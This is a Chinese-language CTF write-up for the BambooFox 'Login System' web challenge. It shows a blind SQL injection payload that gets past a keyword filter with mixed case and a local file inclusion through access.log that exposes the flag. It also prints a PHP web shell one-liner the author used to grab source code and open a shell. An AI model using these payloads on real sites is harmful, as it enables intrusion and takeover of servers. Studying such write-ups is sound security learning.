BambooFox-Login System-Writeup

作者: 分类: CTF 时间: 2016-02-16 浏览: 2818 评论: 1条评论

题目地址 http://140.113.194.85:49165/loginsystem/

已知信息

web1.png

hint 盲注 文件包含

看看页面

web2.png

常规的admin:admin ':' 测试 (账号密码都是base64加密)

web3.png

返回都是login fail 用test:test测试

web4.png

返回 hello test 于是用 test'#:test 测试

web5.png

返回 hello test 说明成功闭合

接下来尝试union select,select from 均失败 后来基友发现关键字大小写可以使用select from...

payload: test' and (mid((selEct password fRom user liMit 1),1,1)>'0')#

盲注出admin:gogopowerranger

登陆后页面

web7.png

发现有人想尝试注入php代码(当时是这么想的..) 默默记下先

看url估计是文件包含 直接上php://filter/read=convert.base64-encode/resource=security.php

无法读取源码 点击filesystem

web8.png

有flag.php 按理来说就是读取flag.php 捣鼓了很久 突然想起前面那个log 恍然大悟

不就是包含log嘛... 代码前辈都写好了..

于是访问 /loginsystem/user.php?mode=../access.log

web9.png

BAMBOOFOX{F14G_G3tt0_d4z3_!}

这个套路在实战中也会遇到 包含图片马 包含access.log 和 /proc/self/environ

然后... 既然可以包含 看看权限怎么样

发现system没被ban

果断<?php system($_GET[cmd]);?> 然后顺走了源码 顺便弹了个shell出来

看了下内核3.13.0-76-generic 还是不提了 做人留一线 (没exp怎么提..)

订阅本站(RSS)

仅有 1 条评论

  1. 乐师傅666!

    时间: 2016-02-21 at 11:44 回复

添加新评论